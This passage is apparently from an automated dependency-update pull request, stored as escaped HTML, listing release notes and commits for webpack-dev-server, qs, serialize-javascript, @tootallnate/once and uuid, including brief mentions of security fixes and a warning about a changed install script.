(2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.0...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@tootallnate/once` from 2.0.0 to 2.0.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/releases\"\u003e@​tootallnate/once's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/blob/v2.0.1/CHANGELOG.md\"\u003e@​tootallnate/once's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/bcbb21d387e5fb2d0bf8ec2fd8d0ac97d4553241\"\u003e\u003ccode\u003ebcbb21d\u003c/code\u003e\u003c/a\u003e ci: fix OIDC publishing — Node 24, npm latest, provenance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dc24387be8e3405f1e7c911caf76c87b72a0e145\"\u003e\u003ccode\u003edc24387\u003c/code\u003e\u003c/a\u003e Version Packages (2.x) (\u003ca href=\"https://redirect.github.com/TooTallNate/once/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b8a6f80afcfd2482b4bdb1e29d784340a05e0ce3\"\u003e\u003ccode\u003eb8a6f80\u003c/code\u003e\u003c/a\u003e CI: test all Node versions on Linux only\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dabcc0fb6202663cd83994f0a21ea1c710395327\"\u003e\u003ccode\u003edabcc0f\u003c/code\u003e\u003c/a\u003e ci: drop EOL Node.js 14.x/16.x, add 22.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b464efcf4238d92590245b4d211d2fc05a94d28a\"\u003e\u003ccode\u003eb464efc\u003c/code\u003e\u003c/a\u003e Update CI: modern Node versions, fix macOS ARM64 compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/a1e5e2d784bcd1c65e49fac1524c6c94fe81f871\"\u003e\u003ccode\u003ea1e5e2d\u003c/code\u003e\u003c/a\u003e Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/TooTallNate/once/compare/2.0.0...v2.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​tootallnate/once\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.13.0 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.0...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `serialize-javascript` from 6.0.1 to 6.0.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/yahoo/serialize-javascript/releases\"\u003eserialize-javascript's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev6.0.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: serialize URL string contents to prevent XSS (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/173\"\u003e#173\u003c/a\u003e)  f27d65d\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003e@​babel/traverse\u003c/code\u003e from 7.10.1 to 7.23.7 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/171\"\u003e#171\u003c/a\u003e)  02499c0\u003c/li\u003e\n\u003cli\u003edocs: update readme with URL support (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/146\"\u003e#146\u003c/a\u003e)  0d88527\u003c/li\u003e\n\u003cli\u003echore: update node version and lock file  e2a3a91\u003c/li\u003e\n\u003cli\u003efix typo (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/164\"\u003e#164\u003c/a\u003e)  5a1fa64\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/b71ec23841d7cf30847d3071d9da38ee0b397fc8\"\u003e\u003ccode\u003eb71ec23\u003c/code\u003e\u003c/a\u003e 6.0.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\"\u003e\u003ccode\u003ef27d65d\u003c/code\u003e\u003c/a\u003e fix: serialize URL string contents to prevent XSS (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/173\"\u003e#173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/02499c0adfb40f48e1ebdcbe6fffc83b162b95e9\"\u003e\u003ccode\u003e02499c0\u003c/code\u003e\u003c/a\u003e Bump \u003ccode\u003e@​babel/traverse\u003c/code\u003e from 7.10.1 to 7.23.7 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/0d885272f45069b1207189ae18a6f2726b4abaa9\"\u003e\u003ccode\u003e0d88527\u003c/code\u003e\u003c/a\u003e docs: update readme with URL support (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/e2a3a9173e6770ee92e02d95d6a8e7958dfb419d\"\u003e\u003ccode\u003ee2a3a91\u003c/code\u003e\u003c/a\u003e chore: update node version and lock file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/5a1fa646d9cbbe0b4f13c07f01c249fb2493e20f\"\u003e\u003ccode\u003e5a1fa64\u003c/code\u003e\u003c/a\u003e fix typo (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/164\"\u003e#164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 3.3.2 to 3.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v3.3.3...v3.4.0\"\u003e3.4.0\u003c/a\u003e (2020-01-16)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erename repository to github:uuidjs/uuid (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/351\"\u003e#351\u003c/a\u003e) (\u003ca 